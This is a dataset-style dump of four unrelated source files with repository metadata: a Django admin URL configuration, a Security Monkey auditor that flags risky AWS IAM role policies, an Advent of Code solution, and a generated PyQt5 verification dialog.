ace7625bc8d75f5eb8268a1640f85a5de6b94479 | 2,812 | py | Python | papermerge/contrib/admin/urls.py | PixelJonas/papermerge-core | 2bdb90604a2df403cc21c52b4ef9a394f5b00814 | [
"Apache-2.0"
] | null | null | null | papermerge/contrib/admin/urls.py | PixelJonas/papermerge-core | 2bdb90604a2df403cc21c52b4ef9a394f5b00814 | [
"Apache-2.0"
] | null | null | null | papermerge/contrib/admin/urls.py | PixelJonas/papermerge-core | 2bdb90604a2df403cc21c52b4ef9a394f5b00814 | [
"Apache-2.0"
] | null | null | null | from django.urls import path
from papermerge.contrib.admin import views
app_name = 'admin'
urlpatterns = [
path(
'', views.BrowseView.as_view(), name="index"
),
path(
'inbox/', views.inbox_view, name="inbox"
),
path(
'browse', views.BrowseView.as_view(), name="browse"
),
path(
'search', views.search, name="search"
),
path(
'logs', views.LogsListView.as_view(), name="logs"
),
path(
'log/<int:pk>/',
views.LogUpdateView.as_view(),
name="log-update"
),
path(
'tags/', views.TagsListView.as_view(), name="tags"
),
path(
'tag/add/',
views.TagCreateView.as_view(),
name="tag-add"
),
path(
'tag/<int:pk>/',
views.TagUpdateView.as_view(),
name='tag-update'
),
path(
'groups/',
views.GroupsListView.as_view(),
name='groups'
),
path(
'group/add/',
views.GroupCreateView.as_view(),
name='group-add'
),
path(
'group/<int:pk>/',
views.GroupUpdateView.as_view(),
name='group-update'
),
path(
'users/',
views.UsersListView.as_view(),
name='users'
),
path(
'user/add/',
views.UserCreateView.as_view(),
name='user-add'
),
path(
'user/<int:pk>/',
views.UserUpdateView.as_view(),
name='user-update'
),
path(
'user/<int:pk>/change-password',
views.UserChangePasswordView.as_view(),
name='user-change-password'
),
path(
'roles/',
views.RolesListView.as_view(),
name='roles'
),
path(
'role/add/',
views.RoleCreateView.as_view(),
name='role-add'
),
path(
'role/<int:pk>/',
views.RoleUpdateView.as_view(),
name='role-update'
),
path(
'tokens/',
views.TokensListView.as_view(),
name='tokens'
),
path(
'token/add/',
views.TokenCreateView.as_view(),
name='token-add'
),
path(
'token/<int:pk>/',
views.TokenUpdateView.as_view(),
name='token-update'
),
path(
'automates/',
views.AutomatesListView.as_view(),
name='automates'
),
path(
'automate/add/',
views.AutomateCreateView.as_view(),
name='automate-add'
),
path(
'automate/<int:pk>',
views.AutomateUpdateView.as_view(),
name='automate-update'
),
path(
'preferences/',
views.preferences_view,
name='preferences'
),
path(
'preferences/<str:section>/',
views.preferences_section_view,
name='preferences_section'
),
]
| 21.30303 | 59 | 0.510669 |
ace762bc491bfb0c45032e740fa90c50cc628dac | 4,524 | py | Python | security_monkey/auditors/iam/iam_role.py | security-geeks/security_monkey | e9ce8816f6f85ce886b9f0c01a1a7104289b8ff9 | [
"Apache-2.0"
] | 12 | 2015-09-07T22:27:24.000Z | 2020-04-10T08:56:17.000Z | security_monkey/auditors/iam/iam_role.py | security-geeks/security_monkey | e9ce8816f6f85ce886b9f0c01a1a7104289b8ff9 | [
"Apache-2.0"
] | 2 | 2021-03-20T05:33:09.000Z | 2021-03-26T00:40:13.000Z | security_monkey/auditors/iam/iam_role.py | security-geeks/security_monkey | e9ce8816f6f85ce886b9f0c01a1a7104289b8ff9 | [
"Apache-2.0"
] | 10 | 2015-06-11T05:01:19.000Z | 2020-11-13T11:05:16.000Z | # Copyright 2014 Netflix, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
.. module: security_monkey.auditors.iam.iam_role
:platform: Unix
.. version:: $$VERSION$$
.. moduleauthor:: Patrick Kelley <pkelley@netflix.com> @monkeysecurity
"""
import json
from security_monkey.watchers.iam.iam_role import IAMRole
from security_monkey.auditors.iam.iam_policy import IAMPolicyAuditor
class IAMRoleAuditor(IAMPolicyAuditor):
index = IAMRole.index
i_am_singular = IAMRole.i_am_singular
i_am_plural = IAMRole.i_am_plural
def __init__(self, accounts=None, debug=False):
super(IAMRoleAuditor, self).__init__(accounts=accounts, debug=debug)
def check_star_assume_role_policy(self, iamrole_item):
"""
alert when an IAM Role has an assume_role_policy_document but using a star
instead of limiting the assume to a specific IAM Role.
"""
tag = "{0} allows assume-role from anyone".format(self.i_am_singular)
def check_statement(statement):
action = statement.get("Action", None)
if action and action == "sts:AssumeRole":
effect = statement.get("Effect", None)
if effect and effect == "Allow":
principal = statement.get("Principal", None)
if not principal:
return
if type(principal) is dict:
aws = principal.get("AWS", None)
if aws and aws == "*":
self.add_issue(10, tag, iamrole_item,
notes=json.dumps(statement))
elif aws and type(aws) is list:
for entry in aws:
if entry == "*":
self.add_issue(10, tag, iamrole_item,
notes=json.dumps(statement))
assume_role_policy = iamrole_item.config.get("assume_role_policy_document", {})
statement = assume_role_policy.get("Statement", [])
if type(statement) is list:
for single_statement in statement:
check_statement(single_statement)
elif type(statement) is dict:
check_statement(statement)
def check_star_privileges(self, iamrole_item):
"""
alert when an IAM Role has a policy allowing '*'.
"""
self.library_check_iamobj_has_star_privileges(iamrole_item, policies_key='rolepolicies')
def check_iam_star_privileges(self, iamrole_item):
"""
alert when an IAM Role has a policy allowing 'iam:*'.
"""
self.library_check_iamobj_has_iam_star_privileges(iamrole_item, policies_key='rolepolicies')
def check_iam_privileges(self, iamrole_item):
"""
alert when an IAM Role has a policy allowing 'iam:XxxxxXxxx'.
"""
self.library_check_iamobj_has_iam_privileges(iamrole_item, policies_key='rolepolicies')
def check_iam_passrole(self, iamrole_item):
"""
alert when an IAM Role has a policy allowing 'iam:PassRole'.
This allows the role to pass any role specified in the resource block to an ec2 instance.
"""
self.library_check_iamobj_has_iam_passrole(iamrole_item, policies_key='rolepolicies')
def check_notaction(self, iamrole_item):
"""
alert when an IAM Role has a policy containing 'NotAction'.
NotAction combined with an "Effect": "Allow" often provides more privilege
than is desired.
"""
self.library_check_iamobj_has_notaction(iamrole_item, policies_key='rolepolicies')
def check_security_group_permissions(self, iamrole_item):
"""
alert when an IAM Role has ec2:AuthorizeSecurityGroupEgress or ec2:AuthorizeSecurityGroupIngress.
"""
self.library_check_iamobj_has_security_group_permissions(iamrole_item, policies_key='rolepolicies')
| 41.888889 | 107 | 0.64191 |
ace762d4f844d297eed8c09143dccd705ba7cb20 | 521 | py | Python | src/advent/year2020/day15.py | davidism/advent | 761756f179c3547f44ec035880f29f58d80903f8 | [
"BSD-3-Clause"
] | 5 | 2019-12-09T06:02:22.000Z | 2021-12-03T18:02:49.000Z | src/advent/year2020/day15.py | davidism/advent | 761756f179c3547f44ec035880f29f58d80903f8 | [
"BSD-3-Clause"
] | null | null | null | src/advent/year2020/day15.py | davidism/advent | 761756f179c3547f44ec035880f29f58d80903f8 | [
"BSD-3-Clause"
] | 2 | 2019-09-19T04:44:33.000Z | 2021-05-09T14:39:58.000Z | from collections import defaultdict
from collections import deque
from itertools import count
data = 7, 14, 0, 17, 11, 1, 2
heard = defaultdict(
lambda: deque(maxlen=2),
((x, deque([i], 2)) for i, x in enumerate(data, 1)),
)
spoke = data[-1]
for i in count(len(data) + 1):
if len(heard[spoke]) == 1:
spoke = 0
else:
spoke = heard[spoke][1] - heard[spoke][0]
heard[spoke].append(i)
if i == 2020:
print(spoke)
elif i == 30_000_000:
print(spoke)
break
| 20.84 | 56 | 0.585413 |
ace762f1ecdd72641038f5b2b59ea5b13c9daf0e | 2,394 | py | Python | src/ui/EdceVerificationUI.py | BeTeK/EliteDB | a6ff655f6f78b227bebaaf48d7aa7c8742871011 | [
"BSD-3-Clause"
] | 7 | 2015-06-04T19:46:50.000Z | 2015-07-13T14:15:27.000Z | src/ui/EdceVerificationUI.py | BeTeK/EliteDB | a6ff655f6f78b227bebaaf48d7aa7c8742871011 | [
"BSD-3-Clause"
] | 3 | 2015-06-05T13:08:59.000Z | 2015-07-16T21:39:00.000Z | src/ui/EdceVerificationUI.py | BeTeK/EliteDB | a6ff655f6f78b227bebaaf48d7aa7c8742871011 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'src\ui\EdceVerification.ui'
#
# Created by: PyQt5 UI code generator 5.4.1
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Dialog(object):
def setupUi(self, Dialog):
Dialog.setObjectName("Dialog")
Dialog.resize(373, 345)
self.gridLayout_2 = QtWidgets.QGridLayout(Dialog)
self.gridLayout_2.setObjectName("gridLayout_2")
self.horizontalLayout = QtWidgets.QHBoxLayout()
self.horizontalLayout.setObjectName("horizontalLayout")
spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout.addItem(spacerItem)
self.cancelBtn = QtWidgets.QPushButton(Dialog)
self.cancelBtn.setObjectName("cancelBtn")
self.horizontalLayout.addWidget(self.cancelBtn)
self.okBtn = QtWidgets.QPushButton(Dialog)
self.okBtn.setObjectName("okBtn")
self.horizontalLayout.addWidget(self.okBtn)
self.gridLayout_2.addLayout(self.horizontalLayout, 3, 0, 1, 1)
self.gridLayout = QtWidgets.QGridLayout()
self.gridLayout.setObjectName("gridLayout")
self.label = QtWidgets.QLabel(Dialog)
self.label.setObjectName("label")
self.gridLayout.addWidget(self.label, 0, 0, 1, 1)
self.gridLayout_2.addLayout(self.gridLayout, 0, 0, 1, 1)
self.verificationCodeTxt = QtWidgets.QLineEdit(Dialog)
self.verificationCodeTxt.setObjectName("verificationCodeTxt")
self.gridLayout_2.addWidget(self.verificationCodeTxt, 1, 0, 1, 1)
spacerItem1 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
self.gridLayout_2.addItem(spacerItem1, 2, 0, 1, 1)
self.retranslateUi(Dialog)
QtCore.QMetaObject.connectSlotsByName(Dialog)
def retranslateUi(self, Dialog):
_translate = QtCore.QCoreApplication.translate
Dialog.setWindowTitle(_translate("Dialog", "Edce verification"))
self.cancelBtn.setText(_translate("Dialog", "Cancel"))
self.okBtn.setText(_translate("Dialog", "Ok"))
self.label.setText(_translate("Dialog", "Verification code needed. Check your email and insert code here."))
| 47.88 | 117 | 0.695906 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.